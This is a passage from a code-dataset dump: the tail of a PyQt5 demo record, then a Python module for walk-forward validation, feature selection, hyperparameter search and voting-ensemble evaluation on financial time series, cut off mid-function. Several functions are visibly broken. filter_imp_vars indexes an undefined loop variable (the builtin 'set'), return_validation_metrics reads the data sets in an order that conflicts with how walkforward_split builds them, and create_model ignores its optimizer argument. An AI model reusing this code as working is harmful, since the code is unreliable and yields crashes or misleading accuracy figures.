exit\r\n\r\nwindow()","repo_name":"dvaser/pythonLibrary","sub_path":"Lessons/pyqt5Demo.py","file_name":"pyqt5Demo.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"69800396650","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.optimizers import SGD\nfrom keras import backend as K\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.metrics import (\n    classification_report\n)\nfrom sklearn.model_selection import (\n    RandomizedSearchCV,\n    PredefinedSplit,\n    TimeSeriesSplit\n)\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.utils import indexable\nfrom sklearn.utils.validation import _num_samples\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.feature_selection import SelectFromModel\nimport tensorflow as tf\n\n\nclass TimeSeriesSplitImproved(TimeSeriesSplit):\n    \"\"\"\n    This is a modified version of sklearn's TimeSeriesSplit.\n    Provides train/test indices to split time series data samples\n    that are observed at fixed time intervals, in train/test sets.\n\n    There are 2 modifications to this class.\n    1. 
In each split, test indices must be higher than before,\n    and thus shuffling in the cross-validator is inappropriate.\n    I.e. there is no shuffling of samples.\n    2. There is now the ability to produce splits of fixed length.\n    Previously, the only option was for successive training sets\n    to be supersets of those that come before them. This was\n    not suitable for addressing potential concept drift and\n    therefore the argument 'fixed_length' was added to allow\n    training sets that step forward.\n\n    This cross-validation object is a variation of :class:`KFold`.\n    In the kth split, it returns the first k folds as the train set and the\n    (k+1)th fold as the test set.\n    Note that unlike standard cross-validation methods, successive\n    training sets are supersets of those that come before them.\n    Read more in the :ref:`User Guide <cross_validation>`.\n    Parameters\n    ----------\n    n_splits : int, default=3\n        Number of splits. Must be at least 1.\n    Examples\n    --------\n    >>> from sklearn.model_selection import TimeSeriesSplit\n    >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n    >>> y = np.array([1, 2, 3, 4])\n    >>> tscv = TimeSeriesSplit(n_splits=3)\n    >>> print(tscv)  # doctest: +NORMALIZE_WHITESPACE\n    TimeSeriesSplit(n_splits=3)\n    >>> for train_index, test_index in tscv.split(X):\n    ...    print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n    ...    X_train, X_test = X[train_index], X[test_index]\n    ...    y_train, y_test = y[train_index], y[test_index]\n    TRAIN: [0] TEST: [1]\n    TRAIN: [0 1] TEST: [2]\n    TRAIN: [0 1 2] TEST: [3]\n    >>> for train_index, test_index in tscv.split(X, fixed_length=True):\n    ...    print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n    ...    X_train, X_test = X[train_index], X[test_index]\n    ...    y_train, y_test = y[train_index], y[test_index]\n    TRAIN: [0] TEST: [1]\n    TRAIN: [1] TEST: [2]\n    TRAIN: [2] TEST: [3]\n    >>> for train_index, test_index in tscv.split(X, fixed_length=True,\n    ...    train_splits=2):\n    ...    print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n    ...    X_train, X_test = X[train_index], X[test_index]\n    ...    y_train, y_test = y[train_index], y[test_index]\n    TRAIN: [0 1] TEST: [2]\n    TRAIN: [1 2] TEST: [3]\n\n    Notes\n    -----\n    When ``fixed_length`` is ``False``, the training set has size\n    ``i * train_splits * n_samples // (n_splits + 1) + n_samples %\n    (n_splits + 1)`` in the ``i``th split, with a test set of size\n    ``n_samples//(n_splits + 1) * test_splits``, where ``n_samples``\n    is the number of samples. If fixed_length is True, replace ``i``\n    in the above formulation with 1, and ignore ``n_samples %\n    (n_splits + 1)`` except for the first training set. 
The number\n of test sets is ``n_splits + 2 - train_splits - test_splits``.\n \"\"\"\n\n def split(self, X, y=None, groups=None, fixed_length=False,\n train_splits=1, test_splits=1):\n \"\"\"\n Generate indices to split data into training and test set.\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n y : array-like, shape (n_samples,)\n Always ignored, exists for compatibility.\n groups : array-like, with shape (n_samples,), optional\n Always ignored, exists for compatibility.\n fixed_length : bool, whether training sets should always have\n common length\n train_splits : positive int, for the minimum number of\n splits to include in training sets\n test_splits : positive int, for the number of splits to\n include in the test set\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups) # indexable arrays for x-val\n n_samples = _num_samples(X) # Return number of samples in array-like x\n n_splits = self.n_splits # number of split\n n_folds = n_splits + 1 # num folds (1 split=2 folds, 2 splits=3 folds)\n\n # defaults to 1 for each\n train_splits, test_splits = int(train_splits), int(test_splits)\n\n if n_folds > n_samples:\n raise ValueError(\n (\"Cannot have number of folds ={0} greater\"\n \" than the number of samples: {1}.\").format(n_folds,\n n_samples))\n if (n_folds - train_splits - test_splits) == 0 and test_splits > 0:\n raise ValueError(\n (\"Both train_splits and test_splits must be positive\"\n \" integers.\"))\n\n indices = np.arange(n_samples) # list indices of all the examples\n split_size = (n_samples // n_folds) # number of samples in each fold\n test_size = split_size * test_splits # number of samples in test set\n train_size = split_size * train_splits # num of samples in train set\n test_starts = range(train_size + n_samples % n_folds,\n n_samples - (test_size - split_size),\n split_size)\n if fixed_length:\n for i, test_start in zip(range(len(test_starts)),\n test_starts):\n rem = 0\n if i == 0:\n rem = n_samples % n_folds\n yield (indices[(test_start - train_size - rem):test_start],\n indices[test_start:test_start + test_size])\n else:\n for test_start in test_starts:\n yield (indices[:test_start],\n indices[test_start:test_start + test_size])\n\n\ndef return_walkforward_indices(X):\n \"\"\"\n For the train and test sets, this function returns the corresponding\n indices for each separate sliding window\n\n Parameters\n ----------\n X (df): the original X dataframe containing all features related\n to the asset in question\n\n Returns\n -------\n train_indices (list of arrays): arrays containing indices of each\n sliding window training samples\n E.g. [array([0, 1, 2, 3, 4]), array([5, 6, 7, 8, 9])]\n test_indices (list): arrays containing indices of each\n sliding window test samples\n E.g. 
[array([5, 6, 7]), array([10, 11, 12])]\n\n \"\"\"\n # set up the generator function to split the dataset into 4 windows\n tscv = TimeSeriesSplitImproved()\n split = tscv.split(X, fixed_length=True, train_splits=2, test_splits=1)\n\n train_indices = []\n test_indices = []\n\n for train_index, test_index in split:\n train_indices.append(train_index)\n test_indices.append(test_index)\n\n return train_indices, test_indices\n\n\ndef walkforward_split(X, y):\n \"\"\"\n This function uses the train and test indices of each sliding window\n - returned by return_walkforward_indices() - to slice the dataframe,\n creating n separate sliding windows.\n\n For each sliding window, there is now X_train, y_train, X_test, y_test.\n e.g. X_train_0, y_train_0, X_test_0, y_test_0 is for the first sliding\n window.\n\n The function also scales the inputs of each sliding window. The scaler\n is fit on each sliding window's training set, rather than the training\n set as a whole.\n\n Parameters\n ----------\n X (df): the original X dataframe containing all features related\n to the asset in question\n y (Series): the original labels that correspond with X\n\n Returns\n -------\n sets (dict of matrices): dict containing the train and test matrices\n for each sliding window.\n \"\"\"\n train_indices, test_indices = return_walkforward_indices(X)\n sets = {}\n scaler = StandardScaler()\n\n num_windows = len(train_indices)\n\n # for each sliding window (which equals the sum of train and test splits)\n for i in np.arange(num_windows):\n\n # create sliding window 'i' (containing train and test)\n set = {'X_train_'+str(i): pd.DataFrame(X.values[train_indices[i]]),\n 'y_train_'+str(i): pd.DataFrame(y.values[train_indices[i]]),\n 'X_test_'+str(i): pd.DataFrame(X.values[test_indices[i]]),\n 'y_test_'+str(i): pd.DataFrame(y.values[test_indices[i]])\n }\n sets.update(set)\n\n # scale the inputs for easier neural network learning\n for i in np.arange(0, len(sets), 4): # for each sliding window train set\n\n # fit scaler on the training data of training set 'i'\n # (only the training - don't cheat!)\n scaler.fit(list(sets.values())[i])\n\n # apply transformation on the training set\n list(sets.values())[i].\\\n update(scaler.transform(list(sets.values())[i]))\n # apply transformation on the test set\n list(sets.values())[i+2]\\\n .update(scaler.transform(list(sets.values())[i+2]))\n\n return sets\n\n\ndef model_selection_sets(windows, test_size=0.3):\n \"\"\"\n This function takes each sliding window training set and breaks\n it into a train and validation set for the purpose of model selection.\n\n Again, samples are not shuffled. It is a simple split to keep\n sequential ordering.\n\n Parameters\n ----------\n windows (dict of matrices): the dictionary containing the sets\n corresponding with each sliding window that is produced by\n walkforward_split().\n test_size (float): a float between 0 and 1 that determines the\n size of the proportion of samples to be assigned to the\n validation set.\n\n Returns\n -------\n sets_ms (dict of matrices): dict containing the train and validation\n set matrices for each sliding window, to be used for model\n selection.\n E.g. 
dict_keys(\n ['X_train_0', 'X_val_0', 'y_train_0', 'y_val_0', # SW0 MS sets\n 'X_train_1', 'X_val_1', 'y_train_1', 'y_val_1', # SW1 MS sets\n .....\n 'X_train_N', 'X_val_N', 'y_train_N', 'y_val_N', # SWN MS sets\n ])\n \"\"\"\n\n sets_ms = {} # ms = model selection\n\n for i in np.arange(0, len(windows), 4): # for each SW train set\n X_train, X_val, y_train, y_val = train_test_split(\n list(windows.values())[i],\n list(windows.values())[i+1],\n # i = X_train for given window, i+1 = y_train for given window\n test_size=test_size, shuffle=False)\n\n set_ms = {list(windows.keys())[i]+'_'+'a': X_train,\n 'X_val_'+str(list(windows.keys())[i])[8]: X_val,\n list(windows.keys())[i+1]+'_'+'a': y_train,\n 'y_val_'+str(list(windows.keys())[i])[8]: y_val}\n\n sets_ms.update(set_ms)\n\n return sets_ms\n\n\ndef extract_imp_feats(X_train, X_val, y_train, threshold_value, original):\n \"\"\"\n Runs a random forest on the train and validation set,\n then extracts the important features using SelectFromModel() function.\n\n Parameters\n ----------\n threshold_value: the threshold above which a variable is deemed\n 'important'\n original: the original X dataframe, from which feature names can be\n retrieved.\n\n Returns\n -------\n strong_features: indices of important features\n X_train_imp: X_train dataframe consisting of only important variables\n X_val_imp: X_val dataframe consisting of only important variables\n note: 'indices' can be used later to find important column names:\n X.columns[indices]\n \"\"\"\n\n # run random forest for feature selection\n rf = RandomForestClassifier(n_estimators=2000, n_jobs=-1)\n\n # select variables with an importance greater than 'threshold_value'\n sfm = SelectFromModel(rf, threshold=threshold_value)\n sfm.fit(X_train, y_train)\n\n # transform X to contain only 'important variables'\n X_train_imp = sfm.transform(X_train)\n X_val_imp = sfm.transform(X_val)\n\n # extract the important variables for use in out of sample testing\n strong_features = [] # indices of the selected features\n for feature in sfm.get_support(indices=True):\n strong_features.append(feature)\n\n return strong_features, X_train_imp, X_val_imp\n\n\ndef optimal_threshold(threshold_values, train_test_sets,\n sets_model_selection, original_df):\n \"\"\"\n Determines the optimal 'importance' threshold by selecting that which\n minimises the Random Forest out-of-bag error for the validation set.\n\n Parameters\n ----------\n threshold_values (list): an array of thresholds\n e.g. [0.005, ..., 0.009]\n train_test_sets (dict of matrices): dict containing the train and test\n matrices for each sliding window.\n sets_model_selection (dict of matrices): dict containing the train and\n validation sets for each sliding window.\n original_df: the original X dataframe, from which feature names can be\n retrieved\n\n Returns\n -------\n min_idx: index of threshold that minimises oob error\n df_errors: a dataframe containing errors for each sliding window and\n threshold setting\n \"\"\"\n threshold_errors = {} # dict to hold the oob error rates for each SW\n\n # return important features for each SW, for a given thresh. 
value\n    for threshold in enumerate(threshold_values):  # for each threshold value\n        indices_important = {}\n\n        error_rates = []  # store sliding window errors for each threshold\n\n        for i in np.arange(0, len(train_test_sets), 4):\n\n            # assign the train and validation sets for the given sliding window\n\n            X_train = list(sets_model_selection.values())[i]\n            X_val = list(sets_model_selection.values())[i+1]\n            y_train = list(sets_model_selection.values())[i+2]\n            y_val = list(sets_model_selection.values())[i+3]\n\n            # feat selection using RF, returning reduced train and val sets\n            feature_index, X_train, X_val = extract_imp_feats(\n                X_train,\n                X_val,\n                y_train,\n                threshold_value=threshold[1],\n                original=original_df)\n\n            # store the important indices for the sliding window in question\n            _ = {'indices_' +\n                 str(list(sets_model_selection.keys())[i])[8]: feature_index}\n\n            # update the dict with the indices of important vars for each SW\n            indices_important.update(_)\n\n            # evaluate performance of these variables using a standard RF\n            rf = RandomForestClassifier(n_estimators=1000, oob_score=True,\n                                        n_jobs=-1)\n\n            # X_train is now the reduced dataframe (only imp. vars)\n            rf.fit(X_train, y_train)\n            oob_error = 1 - rf.oob_score_\n            error_rates.append(oob_error)\n\n        # update dictionary with errors for each sliding window\n        threshold_errors.update(\n            {str(threshold[1])+\"_threshold\": error_rates})\n    df_errors = pd.DataFrame(list(threshold_errors.values())).T\n\n    # returns the index of threshold that minimises oob error for each SW\n    min_idx = df_errors.idxmin(axis=1)\n\n    return min_idx, df_errors\n\n\n
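# example wiring (hypothetical names):\n#   thresholds = [0.005, 0.007, 0.009]\n#   min_idx, errors = optimal_threshold(thresholds, sets, sets_ms, X)\n#   indices = extract_imp_features(X, sets, sets_ms, thresholds, min_idx)\n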
def extract_imp_features(X, sets, sets_ms, threshold_settings, opt_thresh_idx):\n    \"\"\"\n    Extract important features (their indices) using the thresholds determined\n    by optimal_threshold().\n\n    E.g. if there are 4 sliding windows, each with the 4 sets required for\n    model selection:\n\n    sets_ms = dict_keys(['X_train_0_a', 'X_val_0', 'y_train_0_a', 'y_val_0',\n                         'X_train_1_a', 'X_val_1', 'y_train_1_a', 'y_val_1',\n                         'X_train_2_a', 'X_val_2', 'y_train_2_a', 'y_val_2',\n                         'X_train_3_a', 'X_val_3', 'y_train_3_a', 'y_val_3'])\n\n    Pass the dicts associated with each sliding window to extract_imp_feats().\n\n    Parameters\n    ----------\n    X (df): the original X dataframe, from which feature names can be\n        retrieved\n    sets (dict of dfs): Dict containing the train and test sets\n        associated with each sliding window. Generated by\n        walkforward_split().\n    sets_ms (dict of matrices): Dict containing the train and validation\n        indices for a given asset.\n    threshold_settings (list): list of thresholds e.g. [0.005, ..., 0.009].\n    opt_thresh_idx (int): the index of threshold settings found to be\n        optimal via optimal_threshold().\n    Returns\n    -------\n    indices (dict): a dictionary containing the lists of feature indices\n        deemed to be important for each sliding window.\n    \"\"\"\n\n    indices = {}\n\n    # step through the sets 4 at a time, because there are 4 dicts\n    # assoc. w/ each sliding window (X_train_val, X_val, y_train_val, y_train)\n    for idx, i in enumerate(np.arange(0, len(sets), 4)):\n        # assign the train and validation sets for the given sliding window\n        X_train = list(sets_ms.values())[i]\n        X_val = list(sets_ms.values())[i+1]\n        y_train = list(sets_ms.values())[i+2]\n        y_val = list(sets_ms.values())[i+3]  # 4th\n\n        window_num = str(list(sets_ms.keys())[i])[8]\n\n        # perform feature selection using RF\n        feature_index, \\\n            sets_ms['X_train_' + window_num + '_' + 'a'], \\\n            sets_ms['X_val_' + window_num], \\\n            = extract_imp_feats(\n                X_train,\n                X_val,\n                y_train,\n                threshold_value=threshold_settings[opt_thresh_idx[idx]],\n                original=X)\n\n        imp_indices = {'indices_' + window_num: feature_index}\n        indices.update(imp_indices)\n    return indices\n\n\ndef create_model(optimizer='adam', neurons=1, learn_rate=0.01,\n                 momentum=0, kernel_initializer='normal',\n                 dropout_rate=0.0, input_dim=None):\n    \"\"\"\n    Creates a simple Keras Sequential model that will be passed to a\n    KerasClassifier object.\n\n    Parameters\n    ----------\n    optimizer (str): required to compile a Keras model. See\n        https://www.tensorflow.org/api_docs/python/tf/keras/optimizers\n        for an exhaustive list of optimizers. Note that the function\n        currently compiles with an SGD instance built from learn_rate and\n        momentum, so this argument is effectively overridden.\n    neurons (int): number of units in each hidden Dense layer.\n    learn_rate (float): learning rate of the optimizer.\n    momentum (float): momentum used by the SGD optimizer.\n    kernel_initializer (str): initializer for the first layer's weights.\n    dropout_rate (float): probability that a random node will be dropped\n        in each weight update cycle.\n    input_dim (int): number of features in dataset\n    Returns\n    -------\n    model: the compiled Keras Sequential model.\n    \"\"\"\n    with tf.device(\"/device:GPU:0\"):\n        # create model\n        model = Sequential()\n        model.add(Dense(neurons, input_dim=input_dim, activation='relu',\n                        kernel_initializer=kernel_initializer))\n        model.add(Dropout(dropout_rate))\n        model.add(Dense(neurons, activation='relu'))\n        model.add(Dense(1, activation='sigmoid'))\n        # Compile model\n        optimizer = SGD(lr=learn_rate, momentum=momentum)\n        model.compile(loss='binary_crossentropy', optimizer=optimizer,\n                      metrics=['accuracy'])\n    return model\n\n\n
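# example param grid for tuning the mlp via create_model (hypothetical values;\n# KerasClassifier forwards matching keyword arguments to build_fn):\n#   param_distributions = {'neurons': [8, 16, 32], 'learn_rate': [0.01, 0.1],\n#                          'momentum': [0.0, 0.9], 'dropout_rate': [0.0, 0.2]}\n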
If True, prompts the building of a Keras\n classifier with the appropriate input dimensions as determined via\n feature selection.\n Returns\n -------\n optimal_models (dict): a dict containing optimal models for each\n sliding window\n optimal_params (dict): a dict containing optimal hyper-parameters for\n each optimal model\n \"\"\"\n # dictionary to hold optimal models for each sliding window\n optimal_models = {}\n optimal_params = {}\n\n for i in np.arange(0, len(train_test_sets), 4):\n # assign the train and validation sets for the given sliding window\n X_train = list(sets_model_selection.values())[i]\n X_val = list(sets_model_selection.values())[i+1]\n y_train = list(sets_model_selection.values())[i+2]\n y_val = list(sets_model_selection.values())[i+3]\n\n # normalise the data (required by the MLP; harmless for tree models)\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_val = scaler.transform(X_val)\n\n # set up the inputs for PredefinedSplit;\n # will be input to RandomizedSearchCV\n my_train_fold = []\n for j in range(len(list(sets_model_selection.values())[i])):\n # -1 means the sample will be in the train set\n my_train_fold.append(-1)\n\n my_test_fold = []\n for j in range(len(list(sets_model_selection.values())[i+1])):\n # 0 means the sample will be in the validation set\n my_test_fold.append(0)\n\n my_fold = my_train_fold + my_test_fold\n\n ps = PredefinedSplit(test_fold=np.asarray(my_fold))\n\n # input dimensions for each MLP model will vary, depending on the\n # sliding window (due to feature selection)\n if mlp:\n input_dims = list(sets_model_selection.values())[i].shape[1]\n model = KerasClassifier(\n build_fn=create_model,\n input_dim=input_dims,\n verbose=0)\n\n # set up the grid search\n mdl_opt = RandomizedSearchCV(\n estimator=model,\n param_distributions=param_distributions,\n n_iter=n_iter,\n cv=ps,\n verbose=1,\n n_jobs=n_jobs) # cv is a single predefined train/validation split\n\n # Fit the random search model: parameter combinations will be trained,\n # then tested on the validation set\n mdl_opt.fit(\n np.concatenate((X_train, X_val), axis=0),\n np.concatenate((y_train.values.ravel(),\n y_val.values.ravel()), axis=0))\n\n # store the optimal model for this sliding window\n mdl = {'optimal_model_sw' +\n str(list(sets_model_selection.keys())[i])[8]:\n mdl_opt.best_estimator_}\n optimal_models.update(mdl)\n\n if mlp:\n mdl_opt.best_estimator_.\\\n model.save('mlp_model_sw' +\n str(list(sets_model_selection.keys())[i])[8] +\n '_fs.h5')\n\n param = {'optimal_model_sw' +\n str(list(sets_model_selection.keys())[i])[8]:\n mdl_opt.best_params_}\n optimal_params.update(param)\n\n if mlp:\n # clear keras session to speed up next round of random search\n K.clear_session()\n tf.reset_default_graph()\n\n return optimal_models, optimal_params\n\n\ndef return_validation_metrics(optimal_models, train_test_sets):\n \"\"\"\n Returns the performance measure(s) of optimal models on their\n respective sliding window.\n\n Models are evaluated on the validation sets if passed train/validation\n sets. E.g. 
'sets_for_model_selection_spx'\n\n Parameters\n ----------\n optimal_models (dict): the optimal models for the respective\n classifier/asset combination\n train_test_sets (dict of matrices): dict containing the train and test\n matrices for each sliding window.\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... , metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n for i in np.arange(0, len(train_test_sets), 4): # for each sliding window\n # define the relevant training and test sets, and model\n X_train = list(train_test_sets.values())[i]\n X_test = list(train_test_sets.values())[i+1]\n y_train = list(train_test_sets.values())[i+2]\n y_test = list(train_test_sets.values())[i+3]\n\n # normalise the data\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n clf_number = int(str(list(train_test_sets.keys())[i])[8])\n\n # extract the relevant model from optimal model dictionary\n clf = list(optimal_models.values())[clf_number]\n\n # fit the model\n clf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.precision_recall_curve(\n y_test,\n y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n\n return all_metrics, y_tests, y_preds, y_scores\n\n\ndef return_validation_metrics_VC(sets_model_selection, train_test_sets,\n optimal_weights, rf_optimal, mlp_optimal,\n xgb_optimal):\n \"\"\"\n Returns the performance measure(s) of optimal models on their respective\n sliding window. Models are evaluated on the test sets.\n\n Pass in the optimal models for the respective classifier/asset combination.\n\n Parameters\n ----------\n sets_model_selection (dict): dict containing the train and validation\n sets for each sliding window.\n train_test_sets (sets):\n optimal_weights (dict): a dictionary w/ four vectors of optimal\n weights, one for each sliding window.\n [rf/mlp/xgb]_optimal: optimal models for a given asset\n E.g. 'rf_spx_optimal_models'\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... 
, metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n for i in np.arange(0, len(sets_model_selection), 4): # for each SW\n sliding_window = int(str(list(train_test_sets.keys())[i])[8])\n clf1 = list(rf_optimal.values())[sliding_window] # RFClassifier\n clf2 = list(mlp_optimal.values())[sliding_window] # KerasClassifier\n clf3 = list(xgb_optimal.values())[sliding_window] # XGBoostClassifier\n\n # define the relevant training and test sets, and model\n X_train = list(sets_model_selection.values())[i]\n X_test = list(sets_model_selection.values())[i+1]\n y_train = list(sets_model_selection.values())[i+2]\n y_test = list(sets_model_selection.values())[i+3]\n\n # normalise the data since MLP is a voter\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n # extract optimal weights for given sliding window\n vc_weights = list(optimal_weights.values())[sliding_window]\n\n eclf = VotingClassifier(estimators=[('rf', clf1),\n ('mlp', clf2),\n ('xgb', clf3)],\n voting='soft',\n weights=vc_weights,\n n_jobs=1)\n\n # fit the model\n eclf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = eclf.predict(X_test)\n y_score = eclf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.precision_recall_curve(\n y_test,\n y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n\n return all_metrics, y_tests, y_preds, y_scores\n\n\ndef tune_weights_ms(train_test_sets, sets_model_selection,\n rf_optimal, mlp_optimal, xgb_optimal):\n \"\"\"\n This determines the optimal weight for each classifier in\n the voting classifier ensemble.\n\n Assumes that optimal RF, MLP and XGB models are already saved in\n their respective dictionaries such as 'rf_spx_optimal_models',\n 'mlp_spx_optimal_models', and 'xgb_spx_optimal_models'. These\n dictionaries are created using model_selection().\n\n Parameters\n ----------\n train_test_sets: the dictionary containing the train/test split\n for each window E.g. 'set_spx'\n sets_model_selection: dict containing the train and validation\n sets for each sliding window.\n (e.g. 'sets_for_model_selection_us5yr')\n [rf/mlp/xgb]_optimal: optimal models for a given asset\n E.g. 
'rf_spx_optimal_models'\n\n Returns\n -------\n optimal weights: a dictionary that contains four vectors of optimal\n weights, one for each sliding window\n \"\"\"\n # set up list of weights\n weights = []\n\n for w1 in range(1, 4):\n for w2 in range(1, 4):\n for w3 in range(1, 4):\n weights.append([w1, w2, w3])\n\n # dictionary to hold optimal weights for each sliding window\n optimal_weights = {}\n\n for i in np.arange(0, len(train_test_sets), 4): # i.e. for each SW\n # set up the voting classifier to be tuned\n sliding_window = int(str(list(train_test_sets.keys())[i])[8])\n clf1 = list(rf_optimal.values())[sliding_window] # RFClassifier\n clf2 = list(mlp_optimal.values())[sliding_window] # KerasClassifier\n clf3 = list(xgb_optimal.values())[sliding_window] # XGBoostClassifier\n\n acc_all = []\n\n for w1 in range(1, 4):\n for w2 in range(1, 4):\n for w3 in range(1, 4):\n # assign the train and validation sets for the given SW\n X_train = list(sets_model_selection.values())[i]\n X_val = list(sets_model_selection.values())[i+1]\n y_train = list(sets_model_selection.values())[i+2]\n y_val = list(sets_model_selection.values())[i+3]\n\n # normalise the data since MLP is a voter\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_val = scaler.transform(X_val)\n\n eclf = VotingClassifier(\n estimators=[('rf', clf1),\n ('mlp', clf2),\n ('xgb', clf3)],\n # prediction based on the argmax(sums pred probs)\n voting='soft',\n weights=[w1, w2, w3],\n n_jobs=1)\n\n eclf = eclf.fit(X_train, y_train.values.ravel())\n y_pred = eclf.predict(X_val)\n acc = metrics.accuracy_score(y_val, y_pred) # accuracy\n acc_all.append(acc)\n\n # identify the optimal VC weights for each sliding window\n weight_vector = {\n 'optimal_weights_sw' +\n str(list(sets_model_selection.keys())[i])[8]:\n # get weight mix associated with highest accuracy\n weights[acc_all.index(max(acc_all))]}\n\n # send the optimal weights to the 'optimal_weights' dictionary\n optimal_weights.update(weight_vector)\n\n return optimal_weights\n\n\ndef filter_imp_vars(sets, important_cols):\n \"\"\"\n When passed a dict containing the X_train and X_test sets\n of the sliding windows, this will remove features that\n aren't important, as determined by extract_imp_features().\n\n Parameters\n ----------\n sets (dict of matrices): dict containing the train\n and test matrices for each sliding window.\n These sets are generated by walkforward_split().\n important_cols (dict): a dictionary containing the\n lists of feature indices deemed to be important\n for each sliding window.\n\n Returns\n -------\n sets (dict of matrices): the input dict, filtered in place so\n that the train and test matrices for each sliding window\n keep only the important features.\n \"\"\"\n\n sets_for_filtering = []\n\n # get X_train and X_test for each sliding window\n for idx in np.arange(0, len(sets), 2):\n sets_for_filtering.append(list(sets.keys())[idx])\n\n # cycle through the X_train and X_tests,\n # leaving the important variables for given sliding window.\n for entry in enumerate(sets_for_filtering):\n # take the number from the end of the set's name e.g. 
\"X_train_0\" = 0\n # this tells us which key from dict \"indices\" to use\n indicie_to_use = int(str(set[1])[-1])\n\n # access only important variables for sliding window\n sets[set[1]] = sets[set[1]]\\\n .iloc[:, list(important_cols.values())[indicie_to_use]]\n\n return sets\n\n\ndef return_final_metrics(optimal_models, train_test_sets, mlp=None):\n \"\"\"\n Returns the performance measure(s) of optimal models on their\n respective sliding window. Models are evaluated on the test sets.\n\n Parameters\n ----------\n optimal_models (dict of objects): dict containing the optimal\n models for the respective classifier/asset combination.\n train_test_sets (dict of matrices): dict containing the train\n and test matrices for each sliding window.\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... , metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n # for each sliding window\n for i in np.arange(0, len(train_test_sets), 4):\n\n # define the relevant training and test sets, and model\n X_train = list(train_test_sets.values())[i]\n X_test = list(train_test_sets.values())[i+2]\n y_train = list(train_test_sets.values())[i+1]\n y_test = list(train_test_sets.values())[i+3]\n\n # normalise the 